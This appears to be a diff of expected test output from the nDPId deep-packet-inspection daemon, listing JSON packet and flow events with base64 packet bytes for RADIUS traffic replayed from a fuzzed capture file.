yBIGAAAAyRoXAABXyB0RVlpXIEMlAFRlc3QgTGFiGgsAAFfIJQVWelcaDQAAOCEOBzA3MDcxGgwAADghEQYAAAAAGhUAADghEg9JbnZhbGlkIFZhbHVlGh0AADghExc0MC44MDQ4ODJOLTc0LjEwMjgzOTQaDAAAOCEUBgAAAQIaDAAAOCEVBgAAAAIaFQAAOCEWD1N0YWRpdW1EaXJlY3QaDAAABYMHBsBQSplQEkID4rD4BVEKK4FucluzaU0="} 01254{"packet_event_id":1,"packet_event_name":"packet","packet_id":105,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":725,"pkt_type":3072,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":725,"pkt_l4_len":0,"thread_ts_msec":1528997217103,"pkt":"AAAMB6xAABRP+4rqDABFAALHIPlAAP8RAAAKDEAexuIZNXIQBxQCswAAAT8Cqw8xhdF672TCSWbkw5Hj930aCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQMxNwZbIqVhATUwMzFJNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3Bwbld0d29yay5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LeoyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmZxMGFjMDAwMDAwYmM0OWE1MjI1YiwgNWIyMmE1NDkvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjE5BAasFAEQIA5WWldDMlRlc3RMYWIaWAAAN2MBBgAAAAIGBgAAAAIMBgAABUM9BgAAABNABgAAAA1BBgAAAAZRBDU2TyYCAnIkFwEAAAsFAADyEldFerwQeByQ1kXOElNqAwIAILdGopoaFAAAV8gHDlZaV0MyVGVzdExhYhoKAABXyGQERVQaEAAAV8gKClN0YW5kYXJkGhBmAFfICwpUZXN0IExhYhoJAABXyA8DMRoKAABXyBAETkoacAAAV8gRC0x5dGRodXJzdBoMAABXyBIGAAAAyRoXAABXyB0RVlpXIEMlAFRlc3QgTGFiGgsAAFfIJQVWelcaDQAAOCEOBzA3MDcxGgwAADghEQYAAAAAGhUAADghEg9JbnZhbGlkIFZhbHVlGh0AADghExc0MC44MDQ4ODJOLTc0LjEwMjgzOTQaDAAAOCEUBgAAAQIaDAAAOCEVBgAAAAIaFQAAOCEWD1N0YWRpdW1EaXJlY3QaDAAABYMHBsBQSplQEkID4rD4BVEKK4FucluzaU0="}
00213{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":105,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":3072,"global_ts_msec":1528997217637} 00199{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":105,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","layer_type":3072,"global_ts_msec":1528997217637}
00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":108,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997221594,"flow_last_seen":1528997221594,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997221594,"l3_proto":"ip4","src_ip":"198.157.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":108,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997221594,"flow_last_seen":1528997221594,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997221594,"l3_proto":"ip4","src_ip":"198.157.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00717{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1528997221594,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528997221594,"pkt":"ABRP+4olANuYVcUnCABFAADh\/iUAAPwRVXHGnRk1CgxAHgcUchAAzbneC0AAxXHEG2jtNCK6Pim9jxODZEQBNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWYyMmE1NDkvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjE5T0oBAgBIFwEAAAEFAAC130tW1AOjyO4EWETLCns4AgUAADpBoI2KsgAA1NEalEdfz2mLAQACCwUAAKYxpY6FFiCOWOh\/rUxMKdLfEvgA+nuQ51DKsqmwU74i6PE="} 00717{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":108,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":21,"flow_packet_id":1,"flow_last_seen":1528997221594,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528997221594,"pkt":"ABRP+4olANuYVcUnCABFAADh\/iUAAPwRVXHGnRk1CgxAHgcUchAAzbneC0AAxXHEG2jtNCK6Pim9jxODZEQBNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXR3b3JrLm9yZywgNWYyMmE1NDkvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjE5T0oBAgBIFwEAAAEFAAC130tW1AOjyO4EWETLCns4AgUAADpBoI2KsgAA1NEalEdfz2mLAQACCwUAAKYxpY6FFiCOWOh\/rUxMKdLfEvgA+nuQ51DKsqmwU74i6PE="}
00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":108,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997221594,"flow_last_seen":1528997221594,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997221594,"l3_proto":"ip4","src_ip":"198.157.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":108,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997221594,"flow_last_seen":1528997221594,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997221594,"l3_proto":"ip4","src_ip":"198.157.25.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
01268{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":109,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":725,"pkt_l4_len":0,"thread_ts_msec":1528997221594,"pkt":"AAAMB6xAABRP+4rqCABFAALHIPtuAP8RAAAKDEAexuIZNXIQB1QCswAAAUECqxyBDV4hA0zB94U9KheYsYAaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8Az1fICQlXSVNQUqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="} 01254{"packet_event_id":1,"packet_event_name":"packet","packet_id":109,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":725,"pkt_l4_len":0,"thread_ts_msec":1528997221594,"pkt":"AAAMB6xAABRP+4rqCABFAALHIPtuAP8RAAAKDEAexuIZNXIQB1QCswAAAUECqxyBDV4hA0zB94U9KheYsYAaCgAAV8gOBFVTGgwAAFfIDQZ3aWZpGg8Az1fICQlXSVNQUqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqo="}
00232{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":109,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":691,"global_ts_msec":1528997221878} 00218{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":109,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":691,"global_ts_msec":1528997221878}
00615{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":111,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997023501,"flow_last_seen":1528997023501,"flow_idle_time":180000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1528997222052,"l3_proto":"ip4","src_ip":"198.162.25.53","dst_ip":"10.12.64.30","src_port":1810,"dst_port":29200,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00615{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":111,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997023501,"flow_last_seen":1528997023501,"flow_idle_time":180000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1528997222052,"l3_proto":"ip4","src_ip":"198.162.25.53","dst_ip":"10.12.64.30","src_port":1810,"dst_port":29200,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}}
00600{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997023501,"flow_last_seen":1528997023501,"flow_idle_time":180000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1528997222052,"l3_proto":"ip4","src_ip":"198.162.25.53","dst_ip":"10.12.64.30","src_port":1810,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00600{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997023501,"flow_last_seen":1528997023501,"flow_idle_time":180000,"flow_min_l4_payload_len":164,"flow_max_l4_payload_len":164,"flow_tot_l4_payload_len":164,"flow_avg_l4_payload_len":164,"midstream":0,"thread_ts_msec":1528997222052,"l3_proto":"ip4","src_ip":"198.162.25.53","dst_ip":"10.12.64.30","src_port":1810,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997046798,"flow_last_seen":1528997046798,"flow_idle_time":180000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"thread_ts_msec":1528997222052,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.77.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":111,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1528997046798,"flow_last_seen":1528997046798,"flow_idle_time":180000,"flow_min_l4_payload_len":655,"flow_max_l4_payload_len":655,"flow_tot_l4_payload_len":655,"flow_avg_l4_payload_len":655,"midstream":0,"thread_ts_msec":1528997222052,"l3_proto":"ip4","src_ip":"10.12.64.30","dst_ip":"198.226.77.53","src_port":29200,"dst_port":1812,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
@@ -136,8 +136,8 @@
00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":120,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997261783,"flow_last_seen":1528997261783,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997261783,"l3_proto":"ip4","src_ip":"198.226.82.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":120,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997261783,"flow_last_seen":1528997261783,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997261783,"l3_proto":"ip4","src_ip":"198.226.82.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00718{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1528997261783,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528997261783,"pkt":"dxRP+4rqcNuYVcUnCABFAADh\/sxAAPwRVP3G4lI1CgxAHgcUchAAzQ3qC0YAxVP5rh2w5Lj8PI2upF4y\/0IBNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXT3b3JrLm9yZywgNWIyMmE1ODkvZjA6N+g6NjA6ZDE6N2Q6MzcvMjIwT0oBAgBIFwEAAAEFAADvkK66gUfrDsISd3KA2Dq0AgUAAEGPAVxuDAAAtFagJxCAdoSLAQACCwUAAF3vTu1rfeBtyKrBBShZZHpQEiKq\/RQqlqya5NkwR6FJjV0="} 00718{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":24,"flow_packet_id":1,"flow_last_seen":1528997261783,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":239,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":239,"pkt_l4_len":205,"thread_ts_msec":1528997261783,"pkt":"dxRP+4rqcNuYVcUnCABFAADh\/sxAAPwRVP3G4lI1CgxAHgcUchAAzQ3qC0YAxVP5rh2w5Lj8PI2upF4y\/0IBNTAzMTE0ODAwNzM2MzgwNzJAd2xhbi5tbmM0ODAubWNjMzExLjNncHBuZXT3b3JrLm9yZywgNWIyMmE1ODkvZjA6N+g6NjA6ZDE6N2Q6MzcvMjIwT0oBAgBIFwEAAAEFAADvkK66gUfrDsISd3KA2Dq0AgUAAEGPAVxuDAAAtFagJxCAdoSLAQACCwUAAF3vTu1rfeBtyKrBBShZZHpQEiKq\/RQqlqya5NkwR6FJjV0="}
00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997261783,"flow_last_seen":1528997261783,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997261783,"l3_proto":"ip4","src_ip":"198.226.82.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}} 00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":24,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997261783,"flow_last_seen":1528997261783,"flow_idle_time":180000,"flow_min_l4_payload_len":197,"flow_max_l4_payload_len":197,"flow_tot_l4_payload_len":197,"flow_avg_l4_payload_len":197,"midstream":0,"thread_ts_msec":1528997261783,"l3_proto":"ip4","src_ip":"198.226.82.53","dst_ip":"10.12.64.30","src_port":1812,"dst_port":29200,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Radius","breed":"Acceptable","category":"Network"}}
01272{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":121,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":725,"pkt_l4_len":0,"thread_ts_msec":1528997261783,"pkt":"AAAMB6xAABRP+4rqCABFAALHIP0lAP8RAAAKDEAexuIZNXIQBxQCswAAAUcCq0DUTgiBVRdCBPZhxwMy\/T4aCiUAV3EOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM2NwZbIqWOATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yaS5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjODAwMDAwYmQ4OWE1MjI1YiwgNWIyMmE1ODkvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjIwBAasFAFKIA5WWldDMlQxc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TyYCAgAkVAEAAAsFAADE2f3MRJYt4jvAki9JKC\/7AwIAIHMK7AgaFAAAV8gHDlZaV0MyVGVzdExhYhoKAABXyAgERVQaEAB2V8gKClN0YW5kYXJkGhAAAFfICwpUZXN0IExhYhoJAABXyA8DMRoKAABXyBAETkoaEQAAZ8gRC0x5bmRodXJzdBoMABBXyBIGAAAAyRoXAABXyB0RVlpXIEMyIFRlc3QgTGFiGgsAAFfIJQVWelcaDQAAOCEOBzA3MDcxGgwAADghEQYAAAAAGhUAADghEg9JbnZhbGlkIFZhbHVkGh0AADghExc0MC44MG84ODJOLTc0LjEwMjgzOVcaDAAAOCEUBgAAAQIaDAAAOCEV\/QAAAAIaFQAAOCEWD1N0YWRpdW1EaXJlY3QaDAAABYMHBsBQSplQEsOMLEiMSdbl\/UWsrT5hVfA="} 01258{"packet_event_id":1,"packet_event_name":"packet","packet_id":121,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":725,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":725,"pkt_l4_len":0,"thread_ts_msec":1528997261783,"pkt":"AAAMB6xAABRP+4rqCABFAALHIP0lAP8RAAAKDEAexuIZNXIQBxQCswAAAUcCq0DUTgiBVRdCBPZhxwMy\/T4aCiUAV3EOBFVTGgwAAFfIDQZ3aWZpGg8AAFfICQlXSVNQUjEwGgkAADghDQM2NwZbIqWOATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yaS5vcmdZAxB+CDFjaXNjb4MGAAAAAR8TZjAtNzktNjAtZDEtN2QtMzceJTAwLWE3LTQyLWQwLWUwLTAwOlZlcml6b25XaUZpQWNjZXNzBQYAAAAIGjEAAAAJASthdWRpdC1zZXNzaW9uLWlkPTEwZmYxMGFjODAwMDAwYmQ4OWE1MjI1YiwgNWIyMmE1ODkvZjA6Nzk6NjA6ZDE6N2Q6MzcvMjIwBAasFAFKIA5WWldDMlQxc3RMYWIaDAAAN2MBBgAAAAIGBgAAAAIMBgAABRQ9BgAAABNABgAAAA1BBgAAAAZRBDU2TyYCAgAkVAEAAAsFAADE2f3MRJYt4jvAki9JKC\/7AwIAIHMK7AgaFAAAV8gHDlZaV0MyVGVzdExhYhoKAABXyAgERVQaEAB2V8gKClN0YW5kYXJkGhAAAFfICwpUZXN0IExhYhoJAABXyA8DMRoKAABXyBAETkoaEQAAZ8gRC0x5bmRodXJzdBoMABBXyBIGAAAAyRoXAABXyB0RVlpXIEMyIFRlc3QgTGFiGgsAAFfIJQVWelcaDQAAOCEOBzA3MDcxGgwAADghEQYAAAAAGhUAADghEg9JbnZhbGlkIFZhbHVkGh0AADghExc0MC44MG84ODJOLTc0LjEwMjgzOVcaDAAAOCEUBgAAAQIaDAAAOCEV\/QAAAAIaFQAAOCEWD1N0YWRpdW1EaXJlY3QaDAAABYMHBsBQSplQEsOMLEiMSdbl\/UWsrT5hVfA="}
00232{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":121,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":691,"global_ts_msec":1528997262078} 00218{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":121,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","l4_data_len":691,"global_ts_msec":1528997262078}
00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":122,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997262272,"flow_last_seen":1528997262272,"flow_idle_time":180000,"flow_min_l4_payload_len":276,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":276,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1528997262272,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1895,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":122,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1528997262272,"flow_last_seen":1528997262272,"flow_idle_time":180000,"flow_min_l4_payload_len":276,"flow_max_l4_payload_len":276,"flow_tot_l4_payload_len":276,"flow_avg_l4_payload_len":276,"midstream":0,"thread_ts_msec":1528997262272,"l3_proto":"ip4","src_ip":"198.226.25.53","dst_ip":"10.12.64.30","src_port":1895,"dst_port":29200,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00824{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"fuzz-2020-02-16-11740.pcap","alias":"nDPId-test","flow_id":25,"flow_packet_id":1,"flow_last_seen":1528997262272,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":318,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":318,"pkt_l4_len":284,"thread_ts_msec":1528997262272,"pkt":"ABRP+4rqcNuYVcUlCABFAAEw\/tJAAPwRVKjG4hk1CgxAHgdnchABHO9uAkcBFNPCS391ou+9cV+4e8winsYaCwAAV8gbBVNQQxpuAAABNxA00HHPRTyBsiZ\/6IZyvYM7SEcCX4QDUPpLB\/Nfl+7+pUh0wsa+NLqA2uxWkFDu5HiEeuARNLVaDzSIzbsbfVqWHWeSG0JbhaHnOPPCnMTZqtKCAvxt6AWKG1d8LjPCNKE\/ymsqNvHxATUwMzExNDgwMDczNjM4MDcyQHdsYW4ubW5jNDgwLm1jYzMxMS4zZ3BwbmV0d29yay5vcmcsIDViMjJhNTg5L2YwOjc5OjYwOmQxOjdkOjM3LzIyMFkMOTA4NDIxMzI5MhIJU3VjY2VzcxkFU1BDTwYDAgAEUBJTw+nZtWuGBh7\/qdpxMTkR"} 